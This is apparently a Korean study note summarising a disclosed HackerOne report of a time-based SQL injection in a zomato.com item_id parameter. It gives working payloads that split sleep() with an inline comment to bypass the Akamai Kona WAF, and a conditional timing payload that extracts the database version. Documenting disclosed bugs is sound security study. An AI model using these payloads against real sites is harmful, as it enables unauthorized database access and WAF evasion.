hackerone-eternal-2018-09-c-403616
[www.zomato.com] SQLi - /php/██████████ - item_id
POST 시 body에 들어가는 데이터 중 item_id에서 SQLi가 일어났다.
Body: res_id=1111&method=add_menu_item_tags&item_id=1111-sleep/*f*/(10)&new_tags[]=3&menu_id=1111
이러한 페이로드를 이용하면 Akamai Kona를 우회할 수 있었다. sleep(숫자) 가 필터링되나보다.
PoC URL과 함께 response time을 기록하였다.
res_id=1111&method=add_menu_item_tags&item_id=1111-if(mid(version/*f*/(),1,1)=4,sleep/*f*/(5),0)&new_tags%5B%5D=3&menu_id=1111 와 같이 Timing based SQLi를 할 수 있었다.
tags: wstg-inpv-05, bughunting, sqli, time-based-sqli, severity critical, web hacking